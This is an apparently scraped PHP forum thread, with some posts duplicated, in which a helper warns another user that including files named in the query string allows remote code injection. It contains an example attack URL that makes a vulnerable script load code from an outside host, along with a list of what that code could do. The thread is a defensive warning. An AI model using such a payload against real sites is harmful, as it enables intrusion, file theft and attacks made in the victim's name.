that's right, include(), by default, will happily process files from remote sites. which means i could write any code i wanted and your file would process it right there, in place. which means i could write some code, to say, list out the entire contents of your directory tree and/or print the contents of any file from your site i want. or launch attacks on remote sites so that it looks like you're the attacker, or spam everyone on the planet, or whatever.
do you see what i'm saying now? it's simple enough to prevent this kind of thing. you cannot include things from the query string. you just can't.
sure, i'm willing to help, if i can. you can try to describe it without getting into specifics like passwords and such - i'm sure you can figure out a way to lay it out.
you're just going to have to take my word that it's a very real, well-known and serious security problem. it's known as code injection. in fact it's spelled out under "security warning" in the official documentation for the include function. i don't know how else i can warn you.
well, assuming that you don't have any xml functions in the code you're talking about here, that xml warning is coming from the remote site, which means it is doing it
I tried emailing you but i got a mailer daemon error. Anyways, this is what I said:
Yeah, I do have database access. I'm willing to assume I've gone about
everything wrong and am open to suggestion and willing to do the base over
again. Any help would, well, help. =P
aye. Whispering didn't make the topic look unread to me nor did it notify that I had a whisper and so I didn't know he had whispered me until 5 days or so after. This way, it gives indication.
haha... i haven't been around in a while. no, i didn't lose interest. can you try emailing me again? it's a gmail address, you shouldn't have any delivery problems.
Comments
http://your.server.com/file.php?http://mysite.com/myillicitcode.php
that's right, include(), by default, will happily process files from remote sites.
which means i could write any code i wanted and your file would process it right there, in place.
which means i could write some code, to say, list out the entire contents of your directory tree and/or print the contents of any file from your site i want. or launch attacks on remote sites so that it looks like you're the attacker, or spam everyone on the planet, or whatever.
do you see what i'm saying now? it's simple enough to prevent this kind of thing. you cannot include things from the query string. you just can't.
I'll try to work on the wording of how my code is all layed out for ease of readability.
http://onemanshortproductions.com
So you can see what I'm working with, at least.
no, i didn't lose interest. can you try emailing me again? it's a gmail address, you shouldn't have any delivery problems.